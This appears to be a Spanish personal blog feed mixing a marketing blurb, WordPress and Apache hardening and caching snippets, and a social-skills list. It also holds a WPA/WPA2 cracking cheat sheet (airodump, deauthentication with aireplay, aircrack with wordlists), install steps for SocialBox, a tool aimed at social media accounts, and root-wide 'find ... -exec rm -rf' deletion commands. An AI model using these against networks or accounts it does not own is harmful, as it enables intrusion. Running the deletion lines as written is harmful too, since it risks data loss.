Si gustas Vendes
Marketing
Joe Polish explains why selling is not evil, and that selling is an essential part of the our everyday lives. got to www.ilovemarketing.com for more of Joe’s awesome content.
Facebook Joe Polish
Impactos: 0
Citrix | Linux | TIC | ITIL | Wintel
Marketing
Facebook Joe Polish
Impactos: 0
Mi canal : Canal YouTube
Mi página : Paula Serrano nueva promesa cordobesa
Impactos: 0
Esta mejora consiste en evitar que al final de la URL aparezca una barra. A nivel de optimización en buscadores, esto significa que los buscadores lo interpretan como una redirección 302. Para evitar esto, es recomendable implementar esta mejora en el fichero htaccess.
Aliños para la seguridad y SEO WordPress (apuntes básicos)
<IfModule mod_rewrite.c> RewriteCond %{REQUEST_URI} /+[^\.]+$ RewriteRule ^(.+[^/])$ %{REQUEST_URI}/ [R=301,L] </IfModule>
Hotlinking significa que alguien está usando un hipervínculo a una imagen que está archivada en otra web, en lugar de guardar una copia física de la imagen en el servidor de la web en el que se mostrará la imagen. Esto supone un consumo de ancho de banda innecesario, que perjudica al SEO.
#Replace ?mysite\.com/ with your blog url RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC] RewriteCond %{HTTP_REFERER} !^$ #Replace /images/nohotlink.jpg with your "don't hotlink" image url RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]
Este es probablemente el fragmento más útil de toda esta lista. Mediante el uso de algunas simples mejoras de cacheo en el fichero .htaccess, puede aumentar drásticamente la velocidad de carga de una página web.
# 1 año <FilesMatch "\.(ico|pdf|flv)$"> Header set Cache-Control "max-age=29030400, public" </FilesMatch> # 1 semana <FilesMatch "\.(jpg|jpeg|png|gif|swf)$"> Header set Cache-Control "max-age=604800, public" </FilesMatch> # 2 días <FilesMatch "\.(xml|txt|css|js)$"> Header set Cache-Control "max-age=172800, proxy-revalidate" </FilesMatch> # 1 minuto <FilesMatch "\.(html|htm|php)$"> Header set Cache-Control "max-age=60, private, proxy-revalidate" </FilesMatch>
Mediante esta mejora en el fichero htaccess, se inlcuye en el Header el tiempo de expiración de un determinado archivo, de este modo este no es cargado nuevamente si es que aun no ha expirado. Se consigue con ellos que no cambien comúnmente como las imágenes, vídeos, ficheros JS y CSS a los cuales podríamos agregarle headers de expiración con lo cual solo se cargarán la primera vez que accedemos a la pagina.
<IfModule mod_rewrite.c>ExpiresActive On ExpiresByType image/jpg "access 1 year" ExpiresByType image/jpeg "access 1 year" ExpiresByType image/gif "access 1 year" ExpiresByType image/png "access 1 year" ExpiresByType text/css "access 1 month" ExpiresByType application/pdf "access 1 month" ExpiresByType text/x-javascript "access 1 month" ExpiresByType application/x-shockwave-flash "access 1 month" ExpiresByType image/x-icon "access 1 year" ExpiresDefault "access 2 days" </IfModule>
Al eliminar la cabecera ETag, se deshabilitan las cachés de los navegadores lo que otorga la posibilidad de validar los archivos, de esta forma el navegador utiliza su Cache-Control y Expires Header para servir los ficheros. Las etiquetas de entidad (eTags) son un mecanismo para comprobar si hay una nueva versión de un archivo almacenado en caché.
<ifModule mod_headers.c>
unset ETag
</ifModule>
FileETag none
Impactos: 0
Implementa este código en el fichero functions.php del tema que estés utilizando para WordPress y eliminar HTML y etiquetas sin valor para el posicionamiento en buscadores
// optimizacion wordpress - delete html trush
remove_action( 'wp_head', 'wp_generator' ) ;
remove_action( 'wp_head', 'noindex', 1 ) ;
remove_action( 'wp_head', 'wlwmanifest_link' ) ;
remove_action( 'wp_head', 'rsd_link' ) ;
remove_action( 'wp_head', 'feed_links', 2 );
remove_action( 'wp_head', 'feed_links_extra', 3 );
remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 );
remove_action( 'wp_head', 'start_post_rel_link', 10, 0 );
add_filter( 'pre_comment_content', 'wp_specialchars' );
//Disallow html in comments
remove_action( 'wp_head', 'wp_shortlink_wp_head', 10, 0 );
/*Eliminar scripts y css de WordPress*/
remove_action( 'wp_head', 'print_emoji_detection_script', 7 );
remove_action( 'admin_print_scripts','print_emoji_detection_script');
remove_action( 'wp_print_styles', 'print_emoji_styles' );
remove_action( 'admin_print_styles', 'print_emoji_styles' );
Impactos: 0
Archivos que comprometen la seguridad de WordPress deberemos editar el archivo .htaccess y añadir al principio del mismo el siguiente código:
# proteger wpconfig.php
<files wp-config.php>
order allow,deny
deny from all
</files>
# proteger htaccess
<files .htaccess>
order allow,deny
deny from all
</files>
Añadir en .htaccess
AuthType Basic
AuthName "Acceso restringido"
AuthUserFile "/home/NOMBRECUENTA/.htpasswds/public_html/wp-admin/passwd"
require valid-user
Para generar estos datos podemos utilizar una página como la siguiente: http://www.htaccesstools.com/htpasswd-generator/
Simplemente añade esto al inicio de tu fichero .htaccess:
Options -Indexes
Añadir al principio.
Header always append X-Frame-Options SAMEORIGIN
Header set X-Content-Type-Options nosniff
Header set X-XSS-Protection "1; mode=block"
find / -name "license.txt" -exec rm -rf {} \;
find / -name "
licencia.txt" -exec rm -rf {} \;
find / -name "
readme.html" -exec rm -rf {} \;
Añadir compresión en .htaccess
<ifModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text/.*
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_exclude mime ^image/.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
</ifModule>
Prueba de compresión
/etc/apache2/conf-enabled/security.conf
si existevim /etc/apache2/conf-enabled/security.conf
cambiar:
ServerTokens Prod
ServerSignature Off
si el fichero no existe crearlo
vim /etc/apache2/conf-available/security.conf
y añadir
ServerTokens Prod
ServerSignature Off
luego habilitarlo con
a2enconf security
service apache2 restart
Impactos: 0
Una de las mejores formas para auditar un handshake obtenidos de WPA/WPA2 es mediante el uso de Aircrack combinado con Wordlist o Diccionarios, como podemos contemplar en la mayoria de videos, tutoriales o finalmente en la practica.
o haciendo uso de Aircrack + Crunch
Código:
crunch 8 8 0123456789 -s 00000000 -e 99999999 | aircrack -e test proof.cap -w –
Otros Diccionarios:
8,6 GB http://www.wordbook.xyz/download/big/g0tmi1k-wordlist.rar
4,5 GB http://www.wordbook.xyz/download/big/WPA-PSK-WORDLIST-3Final.rar
200 MB https://rapidgator.net/folder/646959/wpa2.html
Impactos: 0
Si queremos probar cómo se comporta un equipo o servidor frente ataques directos podemos encontrar plataformas como SocialBox, para medir la seguridad de nuestra cuenta de Facebook, Gmail, Instagram o Twitter, WOOKI o BadMod, para medir la seguridad de aplicaciones web y otras plataformas, y Pure Blood, una popular herramienta para hacer pentesting.
sudo apt-get install git
sudo git clone https://github.com/TunisianEagles/SocialBox.git
cd SocialBox
chmod +x SocialBox.sh
chmod +x install-sb.sh
./install-sb.sh
./SocialBox.sh
Impactos: 0
Chuleta de pasos a seguir
airmon-ng
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 –-bssid <MAC AP> --write <ESSID> wlan0mon
aireplay-ng -0 10 –a <MAC AP> -e <ESSID> wlan0mon
aircrack-ng <ESSID>.cap -w rockyou.txt
El siguiente vídeo muestra los pasos anteriores en ejecución. Mira cómo usar Aircrack-ng para descifrar claves WiFi (WPA/WPA2) con Kali Linux.
Impactos: 0
https://youtu.be/tWcbxSVusms
Dentro de las habilidades sociales verbales destacamos las siguientes:
Expresar que estamos enfadados, irritados o molestos por algo de forma educada.
Solicitar favores.
Hacer cumplidos.
Expresar nuestras opiniones aunque seamos conscientes de que no son compartidas por nuestros interlocutores.
Hablar en público.
Pedir perdón.
Iniciar conversaciones.
Asimilar las críticas de forma positiva.
Defender los derechos personales respetando los de las demás personas.
Admitir que no tenemos conocimiento sobre algún tema.
Aceptar cumplidos.
Oponerse a peticiones de forma educada. Así por ejemplo si un cliente nos pidiera una reducción del precio de un servicio, tenemos que saber decir no de forma educada.
Solicitar de manera respetuosa algún cambio por parte de los demás.
Por otro lado, debemos saber que las habilidades sociales o la conducta social no sólo se compone de la forma en la que nos dirijamos a los demás verbalmente, sino que además incluye componentes no verbales.
Impactos: 0